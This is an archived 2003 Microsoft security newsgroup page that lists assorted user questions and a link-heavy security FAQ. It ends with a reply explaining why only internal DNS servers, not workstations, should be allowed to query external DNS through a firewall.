    - What is "CCEVTMGR.EXE" I turned on my wife's computer today and a Sygate window opened saying Event Manager Service (ccebtmgr.exe) is being contacted from a remote machine crl.verisign.com do you want to allow this program access to the network. Not ever having seen this before I said no. Does anyone know what this is? Thanks, Mac (The computer runs Win98se and I have Sygate Personal Firewall on). Tag: DNS Security Tag: 42015
  - 20
    - ** READ THIS BEFORE POSTING - answers to frequently asked questions 2003.12.16 Before you post a question to a Microsoft.public.*.security newsgroup, note that your question may already be answered below: Answers to Top Frequently Asked Questions: http://securityadmin.info My question is not mentioned below. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette I just heard about a new Microsoft security patch update. Where can I get the patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I just installed a Microsoft security patch update, and now my computer is having problems. http://securityadmin.info/faq.htm#patchbroke I received an email from Microsoft / Microsoft Support / Microsoft Internet Security Center claiming to be a security patch [or comprehensive Internet Explorer update]. Is this a virus? http://securityadmin.info/faq.htm#microsoftemail ALSO NOTE: www.grisoft.com is free antivirus, USE IT. I received a virus email from a Microsoft email address. Who do I report this to? http://securityadmin.info/faq.htm#microsoftemail I have the RPC Blaster worm "virus," what do I do? http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. My computer is giving RPC Remote Procedure Call messages. There is a TFTP message or file on my computer. My computer keeps locking up, and/or rebooting, or telling me that it will reboot in 1 minute. http://www.microsoft.com/security/incident/blast.asp ALSO NOTE: www.grisoft.com is free antivirus, USE IT. Where can I download the Blaster worm / RPC DCOM patch? http://windowsupdate.microsoft.com OR http://www.microsoft.com/technet/security/current.asp I'm having a problem caused by the JDBGMGR.EXE Teddy Bear "virus" hoax, or I want to replace this file. http://securityadmin.info/faq.htm#jdbgmgr I forgot my Windows logon password and can't log in. How do I reset it? http://securityadmin.info/faq.htm#password I have a problem or a question with a virus or with antivirus. http://securityadmin.info/faq.htm#virus NOTE: www.grisoft.com is free antivirus, USE IT. Why is Outlook Express blocking my attachments as "unsafe"? http://securityadmin.info/faq.htm#attachments How do I stop getting pop-up messages? Or adware? Or spyware? http://securityadmin.info/faq.htm#pop-ups How do I block people from viewing adult or objectionable content on a computer? http://securityadmin.info/faq.htm#contentfilter How do I block spam emails? http://securityadmin.info/faq.htm#spam There is a Content Advisor password blocking me from certain web sites. http://securityadmin.info/faq.htm#contentadvisor How do I delete an FTP folder that a hacker put on my computer and I cannot delete? http://securityadmin.info/faq.htm#ftpfolder Have I been hacked? What do I do if I've been hacked? http://securityadmin.info/faq.htm#hacked How do I re-secure a computer that has been hacked? http://securityadmin.info/faq.htm#re-secure How do I test or improve the security on my computer to avoid being hacked? http://securityadmin.info/faq.htm#harden How do I investigate a suspicious IP address that may be trying to hack me? http://securityadmin.info/faq.htm#trace How do I report a hacker? http://securityadmin.info/faq.htm#reporthacker How do I use a port scanner or vulnerability scanner to test my security? http://securityadmin.info/faq.htm#portscanner How do I encrypt my files and/or hard drive? http://securityadmin.info/faq.htm#encryption How do I get a firewall? IDS? http://securityadmin.info/faq.htm#firewall I want to use the IPSec filtering or IP filtering feature of Windows to block certain ports and have a problem or question. http://securityadmin.info/faq.htm#ipsec I have a problem or question with the XP ICF firewall. http://securityadmin.info/faq.htm#icf I have a problem or question with the IIS URLScan tool. http://securityadmin.info/faq.htm#urlscan How do I change the banner on my computer or server to hide what software version I'm using? http://securityadmin.info/faq.htm#banner How do I enable Windows Auditing to tell who logged into Windows or who accessed a file? http://securityadmin.info/faq.htm#auditing How do I inspect and disable programs that start up when Windows starts? http://securityadmin.info/faq.htm#startup How do I use RUNAS or let someone use RUNAS to run commands as administrator without having to type the password? http://securityadmin.info/faq.htm#runas How do I let non-administrator users run Defrag or change their IP address? http://securityadmin.info/faq.htm#runas My question is not mentioned above. How do I get an answer immediately, with no waiting? http://securityadmin.info/faq.htm#moreinfo See also: http://www.google.com/groups?as_ugroup=microsoft.public.* See also: http://www.google.com/advanced_group_search See also: http://www.google.com I want to post a problem or question to the newsgroup. What info do I need to post in order to get a correct answer quickly? http://securityadmin.info/faq.htm#netiquette Note that this is NOT a full list of all the questions answered in the FAQ. Chances are, your question has probably already been answered. The complete FAQ is at: http://securityadmin.info/faq.htm#contents I hope this is helpful. Feedback, suggestions and criticism regarding the FAQ are welcome and may be emailed to me. kind regards, Karl Levinson, CISSP, MCSE, MVP email: levinson_k@despammed.com Tag: DNS Security Tag: 42010
  - 21
    - password identification When i set up my mn700 i dont recall assinging it a password, now i am updating and its asking for a password for the base station, Is there a work around or a way to identify the password? Thanks Tag: DNS Security Tag: 42006
  - 22
    - Strange Application popup I have the following Application Pop Up in an event log on one of our computers: Event ID: 26 "Application popup: Government Computer : Your ISP will be notified" Is this something that has popped up on the computer in question or is it something that has popped up on a computer trying to log on to the computer? What could trigger an event like that? Tag: DNS Security Tag: 42002
  - 23
    - Email Security If public access is necessary for your computer, is there a way to block just anyone from opening your email? I know you can require a password, however, if you hit cancel, the email opens up anyway. This is becoming a real problem, any help would be greatly appreciated. Tag: DNS Security Tag: 41995
  - 24
    - X-Box.com/retail security I tried logging into my X-Box retailer training and it ask for a user name and password and I don't know it. I didn't need it yesterday for the same thing. Could someone @ Microsoft tell me how to find out my username and password? Tag: DNS Security Tag: 41994
  - 25
    - Per Seat Licences Hi, I've got a web application that runs on an intranet, ASP pages as the user interface, VB6 business layer and an SQL Server database. Is there anyway that I can restrict the number users who can use the site at any one time? Users are not connecting anonymously, if that helps. Thanks for any help. Iain Tag: DNS Security Tag: 41992

Why should I not allow all my workstaions to query DNS
directly on the internet and why should only the DNS
servers be able to access external DNS queries through
the firewall

Top

Re: DNS Security by Karl

Karl
Fri Dec 19 06:53:41 CST 2003

It's not mandatory to do so, but doing this improves your security somewhat,
because you get to prevent a virus or trojan on the computer from using that
port to send data outbound, might help prevent workstations from being
directed to a hostile DNS server that serves up bogus data that redirects
the user to a malicious or spoofed web site through a number of DNS attacks,
etc. You do it because it's unnecessary to allow all those workstations to
talk to the internet on that port. Also, you get to block or redirect
resolution for certain domains, such as blocking AOL AIM by adding an empty
oscar.aol.com or resolving it to 127.0.0.1 or to a firewall that alerts when
someone is infected by a virus that tries to go to www.virus.com You may
get a small reduction in Internet bandwidth and increase in internet speed
as DNS entries are cached locally. etc. etc.

"Scar" <anonymous@discussions.microsoft.com> wrote in message
news:011401c3c5f9$56febed0$a001280a@phx.gbl...
> Why should I not allow all my workstaions to query DNS
> directly on the internet and why should only the DNS
> servers be able to access external DNS queries through
> the firewall

Top